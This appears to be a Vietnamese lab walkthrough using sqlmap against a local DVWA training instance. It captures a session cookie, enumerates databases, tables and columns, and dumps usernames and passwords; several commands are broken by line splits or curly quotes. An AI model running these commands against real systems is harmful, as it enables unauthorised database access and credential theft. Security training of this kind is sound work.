You are on page 1of 6

Phần II: Tấn công SQLi bằng công cụ SQL Map

* Bước 1: Lấy các giá trị của cookie


Bấm F12  vào Storage  Cookie

1
* Bước 2: Tìm database cần khai thác bằng SQLMap
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="PHPSESSID=nk3kro881k50ktv6pioslf8j5g; security=low" --dbs

Trong đó:
-u : URL của website mục tiêu
--dbs : liệt kê danh sách các database
PHPSESSID: ta đã thu được từ bước 1

2
* Bước 3: Tấn công vào database dvwa
Ta lựa chọn database với -D, và liệt kê bảng trong database với -tables
sqlmap -u"http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -
-cookie="PHPSESSID=nk3kro881k50ktv6pioslf8j5g;security=low" -D dvwa --tables

Ta thu được bảng users và guestbook

3
* Bước 4: Xem các column của dvwa
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="PHPSESSID=nk3kro881k50ktv6pioslf8j5g;security=low" -D dvwa -T
users --columns

4
* Bước 5: Sử dụng tham số -C để chọn cột user và password; và sử dụng --
dump để đọc dữ liệu của cột.
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="PHPSESSID=nk3kro881k50ktv6pioslf8j5g;security=low" -D dvwa -T
users -C user,password --dump

 Kết quả ta thu được dữ liệu của bảng user bao gồm cả username và
password như hình bên dưới

sqlmap -u http://127.0.0.1/dvwa/vulnerabilities/sqli/session-input-php --second-order


http://127.0.0.1/dvwa/vulnerabilities/sqli/ --cookies=“security=high; PHPSESSID=vtjjlffaltvmgtired5ra1bnaq” --
data=“id=1&Submit=Submit” --dbs

5
6

You might also like